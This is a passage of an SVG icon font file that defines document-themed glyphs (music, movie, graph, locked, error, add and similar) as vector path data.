<glyph unicode="&#xe9bd;" glyph-name="document-music2" d="M704 472.889l-224-49.778v-247.111c0-44.183-35.817-80-80-80s-80 35.817-80 80c0 44.183 35.817 80 80 80 18.010 0 34.629-5.951 48-15.994v207.994l288 64v-304c0-44.183-35.817-80-80-80s-80 35.817-80 80c0 44.183 35.817 80 80 80 18.010 0 34.629-5.951 48-15.994v200.883zM608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM400 128c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0zM656 160c26.51 0 48 21.49 48 48s-21.49 48-48 48c-26.51 0-48-21.49-48-48s21.49-48 48-48v0z" />
<glyph unicode="&#xe9be;" glyph-name="document-movie" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM320 448h416v-352h-416v352zM416 416v-128h224v128h-224zM416 256v-128h224v128h-224zM352 416v-32h32v32h-32zM352 352v-32h32v32h-32zM352 288v-32h32v32h-32zM352 224v-32h32v32h-32zM352 160v-32h32v32h-32zM672 416v-32h32v32h-32zM672 352v-32h32v32h-32zM672 288v-32h32v32h-32zM672 224v-32h32v32h-32zM672 160v-32h32v32h-32z" />
<glyph unicode="&#xe9bf;" glyph-name="document-movie2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM320 448v-352h416v352h-416zM416 416v-128h224v128h-224zM416 256v-128h224v128h-224zM352 416v-32h32v32h-32zM352 352v-32h32v32h-32zM352 288v-32h32v32h-32zM352 224v-32h32v32h-32zM352 160v-32h32v32h-32zM672 416v-32h32v32h-32zM672 352v-32h32v32h-32zM672 288v-32h32v32h-32zM672 224v-32h32v32h-32zM672 160v-32h32v32h-32z" />
<glyph unicode="&#xe9c0;" glyph-name="document-play" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM384 416l288-144-288-144v288zM416 364.8v-185.6l185.602 92.8-185.602 92.8z" />
<glyph unicode="&#xe9c1;" glyph-name="document-play2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM384 416v-288l288 144-288 144zM416 364.8v-185.6l185.602 92.8-185.602 92.8z" />
<glyph unicode="&#xe9c2;" glyph-name="document-graph" d="M478.699 262.353l-94.699-101.552v-0.8h320v-32h-352v256h32v-176.279l93.12 99.859 70.21-65.472 102.476 109.892h-41.805v32h96v-96h-32v40.88l-123.091-131.999-70.21 65.472zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9c3;" glyph-name="document-graph2" d="M608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM478.699 262.353l-94.699-101.552v-0.8h320v-32h-352v256h32v-176.279l93.12 99.859 70.21-65.472 102.476 109.892h-41.805v32h96v-96h-32v40.88l-123.091-131.999-70.21 65.472z" />
<glyph unicode="&#xe9c4;" glyph-name="document-time" d="M671.121 288h-127.121v127.121c66.746-7.378 119.743-60.375 127.121-127.121zM671.121 256c-7.959-71.999-69-128-143.121-128-79.529 0-144 64.471-144 144 0 74.121 56.001 135.162 128 143.121v-159.121h159.121zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM528 96c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe9c5;" glyph-name="document-time2" d="M703.283 288h-159.283v159.283c84.434-7.609 151.674-74.848 159.283-159.283zM703.283 256c-8.084-89.704-83.474-160-175.283-160-97.202 0-176 78.798-176 176 0 91.809 70.296 167.199 160 175.283v-191.283h191.283zM608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9c6;" glyph-name="document-text5" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM320 768v-64h32v32h32v-128h32v128h32v-32h32v64h-160zM320 448v-32h416v32h-416zM320 544v-32h416v32h-416zM320 352v-32h416v32h-416zM320 256v-32h416v32h-416zM320 160v-32h416v32h-416z" />
<glyph unicode="&#xe9c7;" glyph-name="document-text6" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM320 768v-64h32v32h32v-128h32v128h32v-32h32v64h-160zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM320 448v-32h416v32h-416zM320 544v-32h416v32h-416zM320 352v-32h416v32h-416zM320 256v-32h416v32h-416zM320 160v-32h416v32h-416z" />
<glyph unicode="&#xe9c8;" glyph-name="document-code" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM544 384l-64-256h32l64 256h-32zM416 160l-96 96 96 96 22.4-22.4-73.6-73.6 73.6-73.6-22.4-22.4zM640 160l96 96-96 96-22.4-22.4 73.6-73.6-73.6-73.6 22.4-22.4z" />
<glyph unicode="&#xe9c9;" glyph-name="document-code2" d="M608 864v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM416 128l22.4 22.4-105.6 105.6 105.6 105.6-22.4 22.4-128-128 128-128zM640 128l128 128-128 128-22.4-22.4 105.6-105.6-105.6-105.6 22.4-22.4zM544 384l-64-256h32l64 256h-32z" />
<glyph unicode="&#xe9ca;" glyph-name="document-cloud" d="M513.134 288h-0.947c-35.45 0-64.187-28.407-64.187-64 0-35.346 28.706-64 64.187-64h319.625c35.45 0 64.187 28.407 64.187 64 0 35.346-28.706 64-64.187 64h-1.413c-7.412 36.516-39.696 64-78.4 64-8.724 0-17.122-1.397-24.983-3.978-17.103 39.971-56.789 67.978-103.017 67.978-61.856 0-112-50.144-112-112 0-5.432 0.387-10.774 1.134-16v0zM736 394.517v0 0c2.809-3.471 5.46-7.076 7.942-10.803 2.661 0.189 5.349 0.285 8.058 0.285 45.721 0 85.043-27.396 102.446-66.668 42.404-10.151 73.554-48.086 73.554-93.332 0-52.911-43.116-96-96.303-96h-95.697v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-245.483zM704 423.751v184.249h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211h-191.697c-53.531 0-96.303 42.981-96.303 96 0 41.781 26.885 77.438 64.383 90.59 5.421 74.584 67.649 133.41 143.617 133.41 29.602 0 57.118-8.932 80-24.249v0 0zM544 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9cb;" glyph-name="document-cloud2" d="M743.942 383.715c2.661 0.189 5.349 0.285 8.058 0.285 45.721 0 85.043-27.396 102.446-66.668v0c42.404-10.151 73.554-48.086 73.554-93.332 0-52.911-43.116-96-96.303-96h-319.393c-53.531 0-96.303 42.981-96.303 96 0 41.781 26.885 77.438 64.383 90.59 5.421 74.584 67.649 133.41 143.617 133.41 50.050 0 94.136-25.534 119.942-64.285v0zM736 96v-32.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-168.229c-30.43 25.131-69.452 40.229-112 40.229-86.075 0-157.718-61.79-172.993-143.433-39.908-21.695-67.007-64.031-67.007-112.567 0-70.692 57.243-128 127.878-128h224.122zM544 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9cc;" glyph-name="documents2" d="M223.918 799.945l0.083 0.055c0 0 0 0-0.001 0s0 0 0.001 0c0.126 35.38 28.694 64 63.917 64 0.209 35.38 28.854 64 64.171 64h351.912l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705-0.209-35.38-28.777-64-64-64-0.209-35.38-28.777-64-64-64h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.617 64.235 63.918 64.235v-0.055zM223.999 768c-17.672 0-31.999-14.568-31.999-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855l-448.082 0.145c-35.408 0-63.918 28.759-63.918 64.235v703.765c0 0 0 0-0.001 0.001v-0.001zM287.999 832c-17.672 0-31.999-14.568-31.999-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855v0.145h-448.082c-35.408 0-63.918 28.759-63.918 64.235v703.765h-0.001zM672 896h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM704 880v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9cd;" glyph-name="documents3" d="M287.918 864c0.209 35.38 28.937 64 64.355 64h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-544.082c0-35.408-28.617-63.918-63.918-63.918-0.209-35.38-28.777-64-64-64-0.209-35.38-28.777-64-64-64h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.617 64.235 63.918 64.235 0.082 35.253 28.699 64 64 64v0zM224 64.235l-0.001 703.765c-17.672 0-31.999-14.568-31.999-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855l-448.082 0.145c-35.408 0-63.918 28.759-63.918 64.235zM256 800.145v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.568 31.999 31.855l-448.082 0.145c-35.408 0-63.918 28.759-63.918 64.235v703.765c-17.674 0-32-14.568-32-31.855v0zM704 928v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9ce;" glyph-name="documents4" d="M736 560v-432h128.001c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-96.145h192l192-224v-16zM320 800v95.765c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-128.082v-96.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h127.912zM736 912v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM512 768h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM544 752v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176z" />
<glyph unicode="&#xe9cf;" glyph-name="documents5" d="M736 96h128.082c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-63.765h240l208-243.2v-492.8h-32v448h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v96.082zM736 960v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM544 800v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224z" />
<glyph unicode="&#xe9d0;" glyph-name="document-search" d="M553.883 255.49c-24.635-19.706-55.883-31.49-89.883-31.49-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144 0-34-11.784-65.248-31.49-89.883l171.136-171.136-22.627-22.627-171.136 171.136zM624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM464 256c61.856 0 112 50.144 112 112s-50.144 112-112 112c-61.856 0-112-50.144-112-112s50.144-112 112-112v0z" />
<glyph unicode="&#xe9d1;" glyph-name="document-search2" d="M553.883 255.49c-24.635-19.706-55.883-31.49-89.883-31.49-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144 0-34-11.784-65.248-31.49-89.883l171.136-171.136-22.627-22.627-171.136 171.136zM608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM464 256c61.856 0 112 50.144 112 112s-50.144 112-112 112c-61.856 0-112-50.144-112-112s50.144-112 112-112v0z" />
<glyph unicode="&#xe9d2;" glyph-name="document-star" d="M624 864h16l192-224v-576.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h335.912zM608 832h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v544.211h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811zM640 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM528 224l-128-96 48 160-128 96h160l48 160 48-160h160l-128-96 48-160-128 96z" />
<glyph unicode="&#xe9d3;" glyph-name="document-star2" d="M608 864h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.51 63.918 63.918v544.082h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061zM640 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM528 224l-128-96 48 160-128 96h160l48 160 48-160h160l-128-96 48-160-128 96z" />
<glyph unicode="&#xe9d4;" glyph-name="document-unlocked" d="M768 373.186v298.814l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h352.082v-31.906c0-17.725 14.282-32.094 31.921-32.094h224.157c17.63 0 31.921 14.182 31.921 31.956v160.116c0 17.633-14.302 31.928-32.078 31.928h-191.922v80.076c0 43.838 35.817 79.924 80 79.924 44.491 0 80-35.783 80-79.924v-16.076h32v15.899c0 44.697-26.201 83.284-64 101.287v0 0zM576 64h-352.001c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-257.139c-5.227 0.751-10.569 1.139-16 1.139-61.856 0-112-50.201-112-112.101v-79.899c-17.673 0-32-14.012-32-32.094v-95.906zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM624.11 160h191.781c8.657 0 16.11-7.13 16.11-15.926v-128.147c0-9.051-7.212-15.926-16.11-15.926h-191.781c-8.657 0-16.11 7.13-16.11 15.926v128.147c0 9.051 7.212 15.926 16.11 15.926z" />
<glyph unicode="&#xe9d5;" glyph-name="document-unlocked2" d="M768 640h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h320.082v128.061c0 23.848 12.872 44.463 32 55.458v56.735c0 79.203 64.471 143.746 144 143.746 16.82 0 32.978-2.89 48-8.202v232.202zM576 704.094c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224v-191.906zM816.039 192h16.039c17.639 0 31.921-14.369 31.921-32.094v-159.813c0-18.082-14.292-32.094-31.921-32.094h-224.157c-17.639 0-31.921 14.369-31.921 32.094v159.813c0 18.082 14.292 32.094 32 32.094v80.080c0 61.92 50.144 111.92 112 111.92 61.73 0 112-50.109 112-111.92v-16.080h-32v15.702c0 44.347-35.509 80.298-80 80.298-44.183 0-80-35.596-80-80.298v-79.702h176.039z" />
<glyph unicode="&#xe9d6;" glyph-name="document-locked" d="M576 32v-31.906c0-17.725 14.282-32.094 31.921-32.094h224.157c17.63 0 31.921 14.012 31.921 32.094v159.813c0 17.725-14.282 32.094-31.921 32.094h-0.079v47.827c0 44.726-26.201 83.338-64 101.352v330.821l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h352.082zM576 64h-352.001c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-289.14c-5.227 0.751-10.569 1.14-16 1.14-61.856 0-112-50.166-112-112.173v-47.827h-0.079c-17.63 0-31.921-14.012-31.921-32.094v-95.906zM640 192v47.702c0 44.702 35.817 80.298 80 80.298 44.491 0 80-35.95 80-80.298v-47.702h-160zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM624.11 160h191.781c8.657 0 16.11-7.13 16.11-15.926v-128.147c0-9.051-7.212-15.926-16.11-15.926h-191.781c-8.657 0-16.11 7.13-16.11 15.926v128.147c0 9.051 7.212 15.926 16.11 15.926z" />
<glyph unicode="&#xe9d7;" glyph-name="document-locked2" d="M768 640h-159.811c-35.451 0-64.189 28.375-64.189 63.939v192.061h-319.727c-35.497 0-64.273-28.747-64.273-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h320.082v143.946c0 20.914 13.351 38.671 32 45.287v18.68c0 79.329 64.471 144.086 144 144.086 16.82 0 32.978-2.897 48-8.221v264.221zM576 704.094c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224v-191.906zM608 239.827l-0.079-47.827c-17.63 0-31.921-14.012-31.921-32.094v-159.813c0-17.725 14.282-32.094 31.921-32.094h224.157c17.63 0 31.921 14.012 31.921 32.094v159.813c0 17.725-14.282 32.094-32 32.094v47.827c0 61.951-50.27 112.173-112 112.173-61.856 0-112-50.166-112-112.173zM640 239.702c0 44.702 35.817 80.298 80 80.298 44.491 0 80-35.95 80-80.298v-47.702h-160v47.702z" />
<glyph unicode="&#xe9d8;" glyph-name="document-error" d="M768 130.462v541.538l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h261.901l-37.818-64h416l-96 162.462zM504.727 64h-280.729c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-455.385l-80 135.385-151.273-256zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM656 256l152-256h-304l152 256zM640 192v-96h32v96h-32zM640 64v-32h32v32h-32z" />
<glyph unicode="&#xe9d9;" glyph-name="document-error2" d="M448.222 32h-224.305c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-445.741l-112 189.741-207.778-352zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM656 320l208-352h-416l208 352zM640 192v-96h32v96h-32zM640 64v-32h32v32h-32z" />
<glyph unicode="&#xe9da;" glyph-name="document-cancel" d="M688 121.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM688 0v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
<glyph unicode="&#xe9db;" glyph-name="document-cancel2" d="M688 121.373l-67.882-67.882-22.627 22.627 67.882 67.882-67.882 67.882 22.627 22.627 67.882-67.882 67.882 67.882 22.627-22.627-67.882-67.882 67.882-67.882-22.627-22.627-67.882 67.882zM512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM688-32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
<glyph unicode="&#xe9dc;" glyph-name="document-checked" d="M552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM688 0v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144zM672 56.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xe9dd;" glyph-name="document-checked2" d="M512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM688-32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0zM672 56.235l-75.314 75.314 23.431 23.431 51.882-51.882 99.882 99.882 23.431-23.431-123.314-123.314z" />
<glyph unicode="&#xe9de;" glyph-name="document-add" d="M672 160v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM552.229 32v0 0c32.281-39.088 81.117-64 135.771-64 97.202 0 176 78.798 176 176 0 68.395-39.013 127.678-96 156.809v371.191l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h328.312zM531.191 64h-307.192c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-326.625c-15.259 4.316-31.36 6.625-48 6.625-97.202 0-176-78.798-176-176 0-28.807 6.921-55.998 19.191-80v0 0zM576 848l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM688 0v0c-79.529 0-144 64.471-144 144s64.471 144 144 144c79.529 0 144-64.471 144-144s-64.471-144-144-144z" />
<glyph unicode="&#xe9df;" glyph-name="document-add2" d="M672 160v96h32v-96h96v-32h-96v-96h-32v96h-96v32h96zM512.698 32h-288.781c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-303.941c-24.627 10.27-51.651 15.941-80 15.941-114.875 0-208-93.125-208-208 0-41.237 12-79.67 32.698-112v0 0zM576 896v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM688-32c97.202 0 176 78.798 176 176s-78.798 176-176 176c-97.202 0-176-78.798-176-176s78.798-176 176-176v0z" />
